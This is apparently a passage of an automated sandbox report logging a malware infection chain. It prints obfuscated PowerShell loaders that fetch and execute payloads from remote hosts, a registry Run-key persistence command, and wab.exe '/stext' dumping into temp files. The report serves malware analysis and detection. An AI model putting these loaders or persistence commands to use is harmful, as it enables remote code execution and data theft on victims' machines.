              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Antigyrous='S';$Antigyrous+='ubs';$Antigyrous+='tri';$Disseizure = 1;$Antigyrous+='ng';Function Sortkridtstegningens($Udlossende){$Makah=$Udlossende.Length-$Disseizure;For($Vaesentligheden206=5;$Vaesentligheden206 -lt $Makah;$Vaesentligheden206+=6){$Vrdiomraades+=$Udlossende.$Antigyrous.Invoke( $Vaesentligheden206, $Disseizure);}$Vrdiomraades;}function Caprellidae($Kondenseret){ & ($Fligene) ($Kondenseret);}$festdragtens=Sortkridtstegningens ' S.ovMFo,kloBeathzBelavi overlFaciolVictraMictu/Kphje5Krlha.Osteo0 Prin Sove( TiltWLnfreiNa.osnTeg sdWatero,etatwVaskosRegis TrouNswigsTinges Retsa1Intel0 Aspe. Anal0 C oc;P.aya disshWDoliciLa gbnF,ktu6Trska4 g.nz;an ui OmkamxH tto6Forha4 Fine;Hvidg Ring rFlaskvBakka: Uden1Pyroc2 Unmo1Anili.Stil.0 T,ks) dy.t AendrG GuldeWavescIc,erkAdonio El.f/ Scri2Kaily0Signa1Beb,u0Apnea0Ne,tu1Headw0Tre s1Freml TreadFRecoiiJargorApnoeeSnorkfWhiffoLeysex Bioe/Aspar1Fetic2Pseu.1Udstt. Tope0Snic, ';$Lrredskjolernes=Sortkridtstegningens ' ScleUSpn.msRepedeEne gr Mell-UndreAFluidgFors.eAndennsupert Brav ';$hypermnesia=Sortkridtstegningens 'SemiahSlangtLoosstLage.p Pnhe:Xwfin/Dummk/Polym1 C,pt9Thges4Elect.inval5Repet9 Eksa. Mugg3ligro0 Thom.Bevge6Gulli/M.nkeU SagrnTr lacInk,tobeanfmAarsaiSandscLaiba.LandgmBombedFingepForly ';$Aktiveret=Sortkridtstegningens 'Freqe>fredn ';$Fligene=Sortkridtstegningens ' Molyi ForheTopsax pers ';$Opvarmningsmssige='Mongolisms';$Haandvrksbagere = Sortkridtstegningens 'MediceFibe c Escah SmleoDomin Paste% Unp.a DemepChelipDecardSubfla UnactSu.liaUndon%,rmme\TekstI SelvnIndigd droniUdsvisTyknipBraknoOnestsRenteeSkibsdDeempnKog.ieGennesDyingsTh mu. A,svAempris Rings Emu, Peng&Skyfo&Pusli SteereaflvncTh.nahSkeleoSideo Alb.mtAftvt ';Caprellidae (Sortkridtstegningens 'sekst$LagergDecimlSpectoAsem bEftera,usiolFlam :WorthRDoms,uKnle ia solnPleathCiviloSnedkbKaroleTyndsnGrasssConch= arve(BloodcRaidemSydyedStrkk Pik p/fjortcPerco Appre$Dial,HKuardaA.olia Lv,an.hyrod,igtov JoshrObtaik Fjersfi.msbSt rtaConsugBe eveGryderUngdoemixyp)Umb.l ');Caprellidae (Sortkridtstegningens 'Opmun$SpildgStilllScienoSpilob nkomaVent lHksun:NondiGResoryHellirGglero HonosOu,pucsvkk oCommep Berei smudc ,ini=Pyr o$Sy,tahUnprayPluc p,uraceSynedrBerigmAe opneryt eAngolsBothiiSkefua Domf.E.gotsBede.pSjofelS.ndiijo.rnthydro(Prokl$ AfleAAmts.kBlomstErodeiAtonav toreNonscr atsaeFor ktCon e)Oscil ');$hypermnesia=$Gyroscopic[0];$Charcia= (Sortkridtstegningens ' Most$Mislig WhirlS,geeoHaandb,olicaZ.omelBoard:M elfSCard.kUdarmiR.ssof FugetImpreeUnanntSinca1 B ll4Noedv=V rboNUndereprojiwSyste-PumpeOBaro.bKlassjHumaneForurcNoncrtEl ct SangvS Vriky DistsTh.wlt,ndsteFilodmkvali.,oderN Exhae Sk,btpleur.O,erpWUn.enePaaklbinverCEndomlamblyiDrillegellynUvet,t');$Charcia+=$Ruinhobens[1];Caprellidae ($Charcia);Caprellidae (Sortkridtstegningens ' S,ri$Ansa.STarikkB.njoiSk rpfRealitKartveVariet Dove1Puggi4Nonve. Ph lHSag,
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Indisposedness.Ass && echo t"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Argumentlistens" /t REG_EXPAND_SZ /d "%Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path 'HKCU:\Agenetic76\').Tautologiske178;%Semicomic% ($Affektationernes)"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Argumentlistens" /t REG_EXPAND_SZ /d "%Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path 'HKCU:\Agenetic76\').Tautologiske178;%Semicomic% ($Affektationernes)"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ypvrsbyzkda"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jrikttjaylsubj"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tlouumuumtkhdxgwj"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IMG-466573885783553Folketingsmedlemmers.vbs"
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$Cla
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Metacarpals.Tok && echo t"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$Cla
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Metacarpals.Tok && echo t"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exeProcess created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
              Source: unknownProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
              Source: unknownProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Windows\SysWOW64\clip.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Antigyrous='S';$Antigyrous+='ubs';$Antigyrous+='tri';$Disseizure = 1;$Antigyrous+='ng';Function Sortkridtstegningens($Udlossende){$Makah=$Udlossende.Length-$Disseizure;For($Vaesentligheden206=5;$Vaesentligheden206 -lt $Makah;$Vaesentligheden206+=6){$Vrdiomraades+=$Udlossende.$Antigyrous.Invoke( $Vaesentligheden206, $Disseizure);}$Vrdiomraades;}function Caprellidae($Kondenseret){ & ($Fligene) ($Kondenseret);}$festdragtens=Sortkridtstegningens ' S.ovMFo,kloBeathzBelavi overlFaciolVictraMictu/Kphje5Krlha.Osteo0 Prin Sove( TiltWLnfreiNa.osnTeg sdWatero,etatwVaskosRegis TrouNswigsTinges Retsa1Intel0 Aspe. Anal0 C oc;P.aya disshWDoliciLa gbnF,ktu6Trska4 g.nz;an ui OmkamxH tto6Forha4 Fine;Hvidg Ring rFlaskvBakka: Uden1Pyroc2 Unmo1Anili.Stil.0 T,ks) dy.t AendrG GuldeWavescIc,erkAdonio El.f/ Scri2Kaily0Signa1Beb,u0Apnea0Ne,tu1Headw0Tre s1Freml TreadFRecoiiJargorApnoeeSnorkfWhiffoLeysex Bioe/Aspar1Fetic2Pseu.1Udstt. Tope0Snic, ';$Lrredskjolernes=Sortkridtstegningens ' ScleUSpn.msRepedeEne gr Mell-UndreAFluidgFors.eAndennsupert Brav ';$hypermnesia=Sortkridtstegningens 'SemiahSlangtLoosstLage.p Pnhe:Xwfin/Dummk/Polym1 C,pt9Thges4Elect.inval5Repet9 Eksa. Mugg3ligro0 Thom.Bevge6Gulli/M.nkeU SagrnTr lacInk,tobeanfmAarsaiSandscLaiba.LandgmBombedFingepForly ';$Aktiveret=Sortkridtstegningens 'Freqe>fredn ';$Fligene=Sortkridtstegningens ' Molyi ForheTopsax pers ';$Opvarmningsmssige='Mongolisms';$Haandvrksbagere = Sortkridtstegningens 'MediceFibe c Escah SmleoDomin Paste% Unp.a DemepChelipDecardSubfla UnactSu.liaUndon%,rmme\TekstI SelvnIndigd droniUdsvisTyknipBraknoOnestsRenteeSkibsdDeempnKog.ieGennesDyingsTh mu. A,svAempris Rings Emu, Peng&Skyfo&Pusli SteereaflvncTh.nahSkeleoSideo Alb.mtAftvt ';Caprellidae (Sortkridtstegningens 'sekst$LagergDecimlSpectoAsem bEftera,usiolFlam :WorthRDoms,uKnle ia solnPleathCiviloSnedkbKaroleTyndsnGrasssConch= arve(BloodcRaidemSydyedStrkk Pik p/fjortcPerco Appre$Dial,HKuardaA.olia Lv,an.hyrod,igtov JoshrObtaik Fjersfi.msbSt rtaConsugBe eveGryderUngdoemixyp)Umb.l ');Caprellidae (Sortkridtstegningens 'Opmun$SpildgStilllScienoSpilob nkomaVent lHksun:NondiGResoryHellirGglero HonosOu,pucsvkk oCommep Berei smudc ,ini=Pyr o$Sy,tahUnprayPluc p,uraceSynedrBerigmAe opneryt eAngolsBothiiSkefua Domf.E.gotsBede.pSjofelS.ndiijo.rnthydro(Prokl$ AfleAAmts.kBlomstErodeiAtonav toreNonscr atsaeFor ktCon e)Oscil ');$hypermnesia=$Gyroscopic[0];$Charcia= (Sortkridtstegningens ' Most$Mislig WhirlS,geeoHaandb,olicaZ.omelBoard:M elfSCard.kUdarmiR.ssof FugetImpreeUnanntSinca1 B ll4Noedv=V rboNUndereprojiwSyste-PumpeOBaro.bKlassjHumaneForurcNoncrtEl ct SangvS Vriky DistsTh.wlt,ndsteFilodmkvali.,oderN Exhae Sk,btpleur.O,erpWUn.enePaaklbinverCEndomlamblyiDrillegellynUvet,t');$Charcia+=$Ruinhobens[1];Caprellidae ($Charcia);Caprellidae (Sortkridtstegningens ' S,ri$Ansa.STarikkB.njoiSk rpfRealitKartveVariet Dove1Puggi4Nonve. Ph lHSag,regenteaC erudNdlideSt.nJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Indisposedness.Ass && echo t"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Antigyrous='S';$Antigyrous+='ubs';$Antigyrous+='tri';$Disseizure = 1;$Antigyrous+='ng';Function Sortkridtstegningens($Udlossende){$Makah=$Udlossende.Length-$Disseizure;For($Vaesentligheden206=5;$Vaesentligheden206 -lt $Makah;$Vaesentligheden206+=6){$Vrdiomraades+=$Udlossende.$Antigyrous.Invoke( $Vaesentligheden206, $Disseizure);}$Vrdiomraades;}function Caprellidae($Kondenseret){ & ($Fligene) ($Kondenseret);}$festdragtens=Sortkridtstegningens ' S.ovMFo,kloBeathzBelavi overlFaciolVictraMictu/Kphje5Krlha.Osteo0 Prin Sove( TiltWLnfreiNa.osnTeg sdWatero,etatwVaskosRegis TrouNswigsTinges Retsa1Intel0 Aspe. Anal0 C oc;P.aya disshWDoliciLa gbnF,ktu6Trska4 g.nz;an ui OmkamxH tto6Forha4 Fine;Hvidg Ring rFlaskvBakka: Uden1Pyroc2 Unmo1Anili.Stil.0 T,ks) dy.t AendrG GuldeWavescIc,erkAdonio El.f/ Scri2Kaily0Signa1Beb,u0Apnea0Ne,tu1Headw0Tre s1Freml TreadFRecoiiJargorApnoeeSnorkfWhiffoLeysex Bioe/Aspar1Fetic2Pseu.1Udstt. Tope0Snic, ';$Lrredskjolernes=Sortkridtstegningens ' ScleUSpn.msRepedeEne gr Mell-UndreAFluidgFors.eAndennsupert Brav ';$hypermnesia=Sortkridtstegningens 'SemiahSlangtLoosstLage.p Pnhe:Xwfin/Dummk/Polym1 C,pt9Thges4Elect.inval5Repet9 Eksa. Mugg3ligro0 Thom.Bevge6Gulli/M.nkeU SagrnTr lacInk,tobeanfmAarsaiSandscLaiba.LandgmBombedFingepForly ';$Aktiveret=Sortkridtstegningens 'Freqe>fredn ';$Fligene=Sortkridtstegningens ' Molyi ForheTopsax pers ';$Opvarmningsmssige='Mongolisms';$Haandvrksbagere = Sortkridtstegningens 'MediceFibe c Escah SmleoDomin Paste% Unp.a DemepChelipDecardSubfla UnactSu.liaUndon%,rmme\TekstI SelvnIndigd droniUdsvisTyknipBraknoOnestsRenteeSkibsdDeempnKog.ieGennesDyingsTh mu. A,svAempris Rings Emu, Peng&Skyfo&Pusli SteereaflvncTh.nahSkeleoSideo Alb.mtAftvt ';Caprellidae (Sortkridtstegningens 'sekst$LagergDecimlSpectoAsem bEftera,usiolFlam :WorthRDoms,uKnle ia solnPleathCiviloSnedkbKaroleTyndsnGrasssConch= arve(BloodcRaidemSydyedStrkk Pik p/fjortcPerco Appre$Dial,HKuardaA.olia Lv,an.hyrod,igtov JoshrObtaik Fjersfi.msbSt rtaConsugBe eveGryderUngdoemixyp)Umb.l ');Caprellidae (Sortkridtstegningens 'Opmun$SpildgStilllScienoSpilob nkomaVent lHksun:NondiGResoryHellirGglero HonosOu,pucsvkk oCommep Berei smudc ,ini=Pyr o$Sy,tahUnprayPluc p,uraceSynedrBerigmAe opneryt eAngolsBothiiSkefua Domf.E.gotsBede.pSjofelS.ndiijo.rnthydro(Prokl$ AfleAAmts.kBlomstErodeiAtonav toreNonscr atsaeFor ktCon e)Oscil ');$hypermnesia=$Gyroscopic[0];$Charcia= (Sortkridtstegningens ' Most$Mislig WhirlS,geeoHaandb,olicaZ.omelBoard:M elfSCard.kUdarmiR.ssof FugetImpreeUnanntSinca1 B ll4Noedv=V rboNUndereprojiwSyste-PumpeOBaro.bKlassjHumaneForurcNoncrtEl ct SangvS Vriky DistsTh.wlt,ndsteFilodmkvali.,oderN Exhae Sk,btpleur.O,erpWUn.enePaaklbinverCEndomlamblyiDrillegellynUvet,t');$Charcia+=$Ruinhobens[1];Caprellidae ($Charcia);Caprellidae (Sortkridtstegningens ' S,ri$Ansa.STarikkB.njoiSk rpfRealitKartveVariet Dove1Puggi4Nonve. Ph lHSag,Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Indisposedness.Ass && echo t"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Argumentlistens" /t REG_EXPAND_SZ /d "%Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path 'HKCU:\Agenetic76\').Tautologiske178;%Semicomic% ($Affektationernes)"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ypvrsbyzkda"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jrikttjaylsubj"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tlouumuumtkhdxgwj"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IMG-466573885783553Folketingsmedlemmers.vbs" Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Argumentlistens" /t REG_EXPAND_SZ /d "%Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path 'HKCU:\Agenetic76\').Tautologiske178;%Semicomic% ($Affektationernes)"Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG 